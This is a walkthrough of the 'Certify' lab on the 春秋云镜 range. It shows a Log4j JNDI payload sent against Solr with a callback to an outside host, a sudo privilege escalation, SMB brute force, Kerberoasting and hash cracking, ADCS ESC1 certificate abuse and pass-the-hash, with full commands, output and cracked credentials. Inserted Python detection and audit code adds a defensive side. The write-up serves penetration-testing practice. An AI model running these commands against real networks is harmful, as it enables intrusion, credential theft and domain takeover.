春秋云镜-Certify

  1. FLAG1
  2. FLAG2
  3. FLAG3&FLAG4

FLAG1

Start with a quick fscan sweep of the target.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.135.211
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-16 11:59:40] [INFO] 暴力破解线程数: 1
[2025-04-16 11:59:40] [INFO] 开始信息扫描
[2025-04-16 11:59:40] [INFO] 最终有效主机数量: 1
[2025-04-16 11:59:41] [INFO] 开始主机扫描
[2025-04-16 11:59:41] [INFO] 有效端口数量: 233
[2025-04-16 11:59:41] [SUCCESS] 端口开放 39.99.135.211:22
[2025-04-16 11:59:41] [SUCCESS] 端口开放 39.99.135.211:80
[2025-04-16 11:59:41] [SUCCESS] 服务识别 39.99.135.211:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-16 11:59:45] [SUCCESS] 端口开放 39.99.135.211:8983
[2025-04-16 11:59:46] [SUCCESS] 服务识别 39.99.135.211:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-04-16 11:59:55] [SUCCESS] 服务识别 39.99.135.211:8983 => [http] 产品:Apache Solr Banner:[HTTP/1.1 302 Found.Location: http://172.22.9.19:8983/solr/.]
[2025-04-16 11:59:55] [INFO] 存活端口数量: 3
[2025-04-16 11:59:55] [INFO] 开始漏洞扫描
[2025-04-16 11:59:55] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-04-16 11:59:55] [SUCCESS] 网站标题 http://39.99.135.211 状态码:200 长度:612 标题:Welcome to nginx!
[2025-04-16 11:59:56] [SUCCESS] 网站标题 http://39.99.135.211:8983 状态码:302 长度:0 标题:无标题 重定向地址: http://39.99.135.211:8983/solr/
[2025-04-16 11:59:57] [SUCCESS] 网站标题 http://39.99.135.211:8983/solr/ 状态码:200 长度:16555 标题:Solr Admin
[2025-04-16 12:00:04] [SUCCESS] 扫描已完成: 5/5

39.99.135.211:8983 is a Solr admin panel, and it is affected by the Log4j (JNDI lookup) vulnerability.

http://39.99.135.211:8983/solr/admin/cores?action=${jndi:ldap://tc94uide908k5qcv0xurpcoorfx6lw9l.oastify.com}

Move over to a VPS; java-chains can be used to get a reverse shell back. If the reverse shell is awkward to work in, write an SSH public key onto the box instead.

solr@ubuntu:/opt/solr$ sudo -l
sudo -l
Matching Defaults entries for solr on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User solr may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/gr

Escalate privileges with: sudo grc --pty /bin/sh

solr@ubuntu:~$ sudo grc --pty /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

After escalating to root, write a public key in. flag01 is under /root/flag. Then upload fscan and set up a proxy into the internal network.

FLAG2

Check the internal network's IP range, then start scanning!

root@ubuntu:/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:26:2b:c3 brd ff:ff:ff:ff:ff:ff
inet 172.22.9.19/16 brd 172.22.255.255 scope global dynamic eth0
valid_lft 315357456sec preferred_lft 315357456sec
inet6 fe80::216:3eff:fe26:2bc3/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu:/tmp# ./fscan2 -h 172.22.9.19/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-17 00:40:03] [INFO] 暴力破解线程数: 1
[2025-04-17 00:40:03] [INFO] 开始信息扫描
[2025-04-17 00:40:03] [INFO] CIDR范围: 172.22.9.0-172.22.9.255
[2025-04-17 00:40:03] [INFO] 生成IP范围: 172.22.9.0.%!d(string=172.22.9.255) - %!s(MISSING).%!d(MISSING)
[2025-04-17 00:40:03] [INFO] 解析CIDR 172.22.9.19/24 -> IP范围 172.22.9.0-172.22.9.255
[2025-04-17 00:40:03] [INFO] 最终有效主机数量: 256
[2025-04-17 00:40:03] [INFO] 开始主机扫描
[2025-04-17 00:40:03] [SUCCESS] 目标 172.22.9.19 存活 (ICMP)
[2025-04-17 00:40:03] [SUCCESS] 目标 172.22.9.7 存活 (ICMP)
[2025-04-17 00:40:03] [SUCCESS] 目标 172.22.9.26 存活 (ICMP)
[2025-04-17 00:40:03] [SUCCESS] 目标 172.22.9.47 存活 (ICMP)
[2025-04-17 00:40:06] [INFO] 存活主机数量: 4
[2025-04-17 00:40:06] [INFO] 有效端口数量: 233
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:88
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:80
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:80
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:22
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.19:80
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:21
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.19:22
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:445
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.26:445
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:445
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:389
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:139
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:139
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.26:139
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:135
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.26:135
[2025-04-17 00:40:06] [SUCCESS] 服务识别 172.22.9.47:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-04-17 00:40:07] [SUCCESS] 服务识别 172.22.9.47:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-04-17 00:40:07] [SUCCESS] 服务识别 172.22.9.19:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-17 00:40:11] [SUCCESS] 服务识别 172.22.9.7:88 =>
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.19:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.26:445 =>
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.7:80 => [http]
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.7:445 =>
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.7:389 =>
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.7:139 => Banner:[.]
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.26:139 => Banner:[.]
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.47:80 => [http]
[2025-04-17 00:41:07] [SUCCESS] 服务识别 172.22.9.47:445 =>
[2025-04-17 00:41:07] [SUCCESS] 服务识别 172.22.9.47:139 =>
[2025-04-17 00:41:12] [SUCCESS] 服务识别 172.22.9.7:135 =>
[2025-04-17 00:41:12] [SUCCESS] 服务识别 172.22.9.26:135 =>
[2025-04-17 00:41:12] [INFO] 存活端口数量: 16
[2025-04-17 00:41:12] [INFO] 开始漏洞扫描
[2025-04-17 00:41:12] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-17 00:41:12] [SUCCESS] 网站标题 http://172.22.9.19 状态码:200 长度:612 标题:Welcome to nginx!
[2025-04-17 00:41:12] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.26
主机名: DESKTOP-CBKTVMO
发现的网络接口:
IPv4地址:
└─ 172.22.9.26
[2025-04-17 00:41:12] [SUCCESS] 网站标题 http://172.22.9.47 状态码:200 长度:10918 标题:Apache2 Ubuntu Default Page: It works
[2025-04-17 00:41:12] [SUCCESS] 网站标题 http://172.22.9.7 状态码:200 长度:703 标题:IIS Windows Server
[2025-04-17 00:41:12] [SUCCESS] NetBios 172.22.9.7 DC:XIAORANG\XIAORANG-DC
[2025-04-17 00:41:12] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.7
主机名: XIAORANG-DC
发现的网络接口:
IPv4地址:
└─ 172.22.9.7
[2025-04-17 00:41:12] [SUCCESS] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-17 00:41:12] [SUCCESS] SMB认证成功 172.22.9.47:445 administrator:123456
[2025-04-17 00:41:12] [INFO] 系统信息 172.22.9.47 [Windows 6.1]
[2025-04-17 00:41:12] [SUCCESS] NetBios 172.22.9.47 fileserver Windows 6.1
[2025-04-17 00:41:12] [INFO] SMB2共享信息 172.22.9.47:445 administrator Pass:123456 共享:[print$ fileshare IPC$]
[2025-04-17 00:41:12] [SUCCESS] 目标: http://172.22.9.7:80
漏洞类型: poc-yaml-active-directory-certsrv-detect
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/EasonJim/p/6859345.html

The very first scan already flags a vulnerability on the domain controller, but without any usable information yet there is no way to attack it directly.

The SMB service on 172.22.9.47:445 has a weak password; log in and take a look.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# smbclient //172.22.9.47/fileshare -U administrator%123465
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 13 04:12:10 2022
.. D 0 Wed Jul 13 00:35:09 2022
personnel.db A 61440 Wed Jul 13 03:46:55 2022
secret D 0 Wed Apr 16 11:57:06 2025
Certified_Pre-Owned.7z N 9572925 Wed Jul 13 04:12:03 2022
Certified_Pre-Owned.pdf N 10406101 Wed Jul 13 04:08:14 2022

41152812 blocks of size 1024. 36033208 blocks available
smb: \> cd ..
smb: \> ls
. D 0 Wed Jul 13 04:12:10 2022
.. D 0 Wed Jul 13 00:35:09 2022
personnel.db A 61440 Wed Jul 13 03:46:55 2022
secret D 0 Wed Apr 16 11:57:06 2025
Certified_Pre-Owned.7z N 9572925 Wed Jul 13 04:12:03 2022
Certified_Pre-Owned.pdf N 10406101 Wed Jul 13 04:08:14 2022

41152812 blocks of size 1024. 36033208 blocks available
smb: \> cd secret
smb: \secret\> ls
. D 0 Wed Apr 16 11:57:06 2025
.. D 0 Wed Jul 13 04:12:10 2022
flag02.txt N 659 Wed Apr 16 11:57:06 2025

41152812 blocks of size 1024. 36033208 blocks available

Found flag02.

FLAG3&FLAG4

flag02.txt also contains a hint:

Yes, you have enumerated smb. But do you know what an SPN is?

Download all the files and look through them.

sqlite> select * from xr_users ;
1|admin|admin
2|******|i9XDE02pLVf
3|******|6N70jt2K9sV
4|******|fiAzGwEMgTY
sqlite> select * from xr_members ;
1|huangmin|1|26|15220647319|huangmin@xiaorang.lab
2|zhangrong|1|36|13073815024|zhangrong@xiaorang.lab
3|liying|1|29|13126874319|liying@xiaorang.lab
4|zhaoli|1|44|13075613024|zhaoli@xiaorang.lab
5|zhangyan|0|35|15254139260|zhangyan@xiaorang.lab
6|zhoujing|1|32|15123481906|zhoujing@xiaorang.lab
7|liuying|1|24|13078310649|liuying@xiaorang.lab
.......

personnel.db contains user records and 3 passwords whose usernames are unknown. First, do some data processing: save the contents of xr_users and xr_members to the files pass and user respectively.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat pass|awk -F'|' '{print($3)}'>pass.txt

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat pass.txt
admin
i9XDE02pLVf
6N70jt2K9sV
fiAzGwEMgTY
┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat user|awk -F'|' '{print($2)}' >username.txt

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat username.txt
huangmin
zhangrong
liying
zhaoli
zhangyan
zhoujing
liuying
wanghao
wangqiang
wanglu
zhaoyong
zhangli
wangning
wangyu
...

Brute-force with hydra; two users come out.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# hydra -L username.txt -P pass.txt 172.22.9.26 smb
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-16 13:02:49
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1236 login tries (l:309/p:4), ~1236 tries per task
[DATA] attacking smb://172.22.9.26:445/
[445][smb] host: 172.22.9.26 login: zhangjian password: i9XDE02pLVf
[445][smb] host: 172.22.9.26 login: liupeng password: fiAzGwEMgTY

Then carry out a Kerberoast attack.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 00:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 00:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 00:45:39.767035 <never>

[-] CCache file is not found. Skipping...

This yields hashes for two users; crack them with hashcat.

hashcat  hash /usr/share/wordlists/rockyou.txt
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat hash --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$2fef93477c96377b81b856c0a918b0f8$[...]:@Passw0rd@
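The detection-side counterpart to the Kerberoast step above, as an added example that is not part of the original writeup: a check over Windows Security event 4769 (TGS request) records that flags one requester pulling RC4 (etype 23, the `$krb5tgs$23$` in the hashes) service tickets for several user-account SPNs. The event records are constructed to mirror the SPN accounts GetUserSPNs listed above; the function names are my own.

```python
"""Flag Kerberoast-style activity in Windows Security event 4769 records.
Added example, not from the page; events are constructed sample data."""
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23, the type named in the $krb5tgs$23$ hashes above

# Constructed sample events, reduced to the 4769 fields the check needs.
SAMPLE_4769 = [
    {"TargetUserName": "zhangjian@XIAORANG.LAB", "ServiceName": "zhangxia",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.22.9.19"},
    {"TargetUserName": "zhangjian@XIAORANG.LAB", "ServiceName": "chenchen",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.22.9.19"},
    {"TargetUserName": "zhangjian@XIAORANG.LAB", "ServiceName": "XIAORANG-DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:172.22.9.19"},
    {"TargetUserName": "liying@XIAORANG.LAB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:172.22.9.26"},
]


def is_roast_candidate(ev: dict) -> bool:
    """An RC4 service ticket for a user (not machine) account: the ticket is
    encrypted under the service account's NT hash, so its strength is that of
    the account password. Machine accounts ($) and krbtgt are excluded."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def kerberoast_alerts(events, min_services: int = 2) -> dict:
    """Group candidate tickets by (requesting user, source IP) and alert when
    one requester obtains RC4 tickets for min_services or more distinct SPN
    accounts, which is what a bulk GetUserSPNs -request looks like on the DC."""
    per_requester = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            per_requester[key].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in per_requester.items()
            if len(v) >= min_services}
```

Pairing this with a policy that sets AES-only encryption types on service accounts removes the RC4 tickets the check keys on in the first place.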

Then log in over Remote Desktop as chenchen@xiaorang.lab:@Passw0rd@ and run BloodHound for enumeration (not strictly necessary, since fscan already found the vulnerability earlier).

┌──(root㉿kali)-[~/Desktop/tmp]
└─# bloodhound-python -u chenchen -p @Passw0rd@ -d xiaorang.lab -c all --dns-tcp -ns 172.22.9.7 --auth-method ntlm --zip
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: xiaorang-dc.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: xiaorang-dc.xiaorang.lab
INFO: Found 95 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DESKTOP-CBKTVMO.xiaorang.lab
INFO: Querying computer: XIAORANG-DC.xiaorang.lab
INFO: Done in 00M 06S
INFO: Compressing output into 20250416132802_bloodhound.zip

Upload Certify.exe and look for vulnerable certificate templates.


C:\Users\chenchen\Desktop\新建文件夹>Certify.exe find /vulnerable

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'

[*] Listing info about the Enterprise CA 'xiaorang-XIAORANG-DC-CA'

Enterprise CA Name : xiaorang-XIAORANG-DC-CA
DNS Hostname : XIAORANG-DC.xiaorang.lab
FullName : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Cert Thumbprint : 37BFD9FE73CA81E18E7A87CEBD90AF267E57170E
Cert Serial : 43A73F4A37050EAA4E29C0D95BC84BB5
Cert Start Date : 2023/7/14 12:33:21
Cert End Date : 2028/7/14 12:43:21
Cert Chain : CN=xiaorang-XIAORANG-DC-CA,DC=xiaorang,DC=lab
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
Allow ManageCA, ManageCertificates XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : XR Manager
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : 安全电子邮件, 加密文件系统, 客户端身份验证
mspki-certificate-application-policy : 安全电子邮件, 加密文件系统, 客户端身份验证
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\Authenticated UsersS-1-5-11
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
WriteOwner Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519



Certify completed in 00:00:10.1629693
CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : XR Manage

This template is exploitable.
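Why Certify flags 'XR Manager' comes down to five ESC1 preconditions all holding at once. The audit below is an added example (not Certify's or Certipy's code): it encodes those preconditions, feeds in the template exactly as Certify printed it above, and shows that either of two standard fixes (clearing ENROLLEE_SUPPLIES_SUBJECT, or requiring manager approval) breaks the chain. Function and constant names are my own.

```python
"""Audit a certificate template for the ESC1 misconfiguration Certify reports.
Added example, not Certify or Certipy code; template values are from the page."""
from dataclasses import dataclass, replace

# EKUs that let the issued certificate be used for domain logon. The Chinese
# string is the localized "Client Authentication" Certify printed above.
AUTH_EKUS = {"Client Authentication", "客户端身份验证",
             "PKINIT Client Authentication", "Smart Card Logon", "Any Purpose"}
# Well-known SIDs meaning "any low-privileged principal":
# Everyone, Authenticated Users, BUILTIN\Users.
LOW_PRIV_WELL_KNOWN = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}
MANAGER_APPROVAL = "PEND_ALL_REQUESTS"  # msPKI-Enrollment-Flag bit


@dataclass(frozen=True)
class Template:
    name: str
    name_flags: frozenset        # msPKI-Certificate-Name-Flag
    enrollment_flags: frozenset  # msPKI-Enrollment-Flag
    ekus: frozenset              # pKIExtendedKeyUsage
    signatures_required: int     # Authorized Signatures Required
    enroll_sids: frozenset       # principals holding Enroll on the template


def low_priv_sids(domain_sid: str) -> set:
    """Well-known SIDs plus Domain Users (RID 513) and Domain Computers (515)."""
    return LOW_PRIV_WELL_KNOWN | {f"{domain_sid}-513", f"{domain_sid}-515"}


def esc1_unmet_conditions(t: Template, domain_sid: str) -> list:
    """ESC1 preconditions this template does NOT meet. An empty list means all
    of them hold: a low-privileged enrollee can obtain a logon certificate
    for a subject (UPN) of their choosing."""
    unmet = []
    if "ENROLLEE_SUPPLIES_SUBJECT" not in t.name_flags:
        unmet.append("requester cannot supply the subject")
    if not (t.ekus & AUTH_EKUS):
        unmet.append("no authentication EKU")
    if MANAGER_APPROVAL in t.enrollment_flags:
        unmet.append("manager approval required")
    if t.signatures_required > 0:
        unmet.append("authorized signature required")
    if not (t.enroll_sids & low_priv_sids(domain_sid)):
        unmet.append("no low-privileged enrollment rights")
    return unmet


def is_esc1_vulnerable(t: Template, domain_sid: str) -> bool:
    return not esc1_unmet_conditions(t, domain_sid)


# 'XR Manager' exactly as Certify printed it on this page.
XIAORANG_SID = "S-1-5-21-990187620-235975882-534697781"
XR_MANAGER = Template(
    name="XR Manager",
    name_flags=frozenset({"ENROLLEE_SUPPLIES_SUBJECT"}),
    enrollment_flags=frozenset({"INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS"}),
    ekus=frozenset({"安全电子邮件", "加密文件系统", "客户端身份验证"}),
    signatures_required=0,
    enroll_sids=frozenset({"S-1-5-11", f"{XIAORANG_SID}-512",
                           f"{XIAORANG_SID}-513", f"{XIAORANG_SID}-519"}),
)
# Two standard remediations; either one alone breaks the ESC1 chain.
XR_MANAGER_NO_SAN = replace(XR_MANAGER, name_flags=frozenset())
XR_MANAGER_APPROVAL = replace(
    XR_MANAGER, enrollment_flags=XR_MANAGER.enrollment_flags | {MANAGER_APPROVAL})
```

Running the audit against the three templates reports XR_MANAGER as vulnerable and the two remediated copies as not, each with the single condition that now fails.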

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'administrator@xiaorang.lab'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@xiaorang.lab
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80

We now have administrator's hash, so the domain controller is ours; just log in to this host and the DC to collect the flags.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.7
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-wmiexec --hashes aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80 administrator@172.22.9.26